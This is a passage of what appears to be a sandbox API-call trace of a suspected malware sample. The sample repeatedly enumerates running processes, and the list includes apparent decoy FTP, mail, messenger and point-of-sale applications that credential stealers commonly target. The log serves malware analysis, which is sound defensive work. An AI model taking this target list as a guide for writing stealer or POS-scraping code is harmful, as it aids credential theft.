szExeFile="backgroundTaskHost.exe")) returned 0 [0283.932] CloseHandle (hObject=0x2170) returned 1 [0283.932] Sleep (dwMilliseconds=0x64) [0284.048] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0284.058] Process32First (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.062] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0284.064] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0284.065] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0284.067] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0284.068] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0284.070] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0284.071] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0284.072] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0284.074] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.075] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.079] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0284.081] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.082] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.084] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.085] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.086] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.088] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.089] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.116] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0284.118] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0284.119] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0284.121] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.135] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0284.144] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0284.145] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0284.147] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0284.148] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.150] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0284.151] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0284.153] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0284.157] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0284.159] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0284.160] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0284.161] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0284.164] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0284.165] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0284.166] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0284.171] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0284.174] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0284.175] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0284.177] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0284.179] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0284.181] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0284.251] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0284.254] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0284.256] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0284.258] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0284.260] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0284.262] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0284.268] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0284.270] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0284.272] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0284.273] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0284.275] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0284.277] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0284.283] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0284.285] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0284.287] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0284.289] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0284.292] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0284.369] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0284.371] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0284.373] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0284.375] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0284.377] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0284.378] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0284.380] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0284.382] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0284.384] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0284.385] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0284.387] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0284.389] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0284.390] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0284.392] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0284.394] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0284.395] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0284.397] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0284.399] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0284.400] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0284.402] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0284.453] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0284.456] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, 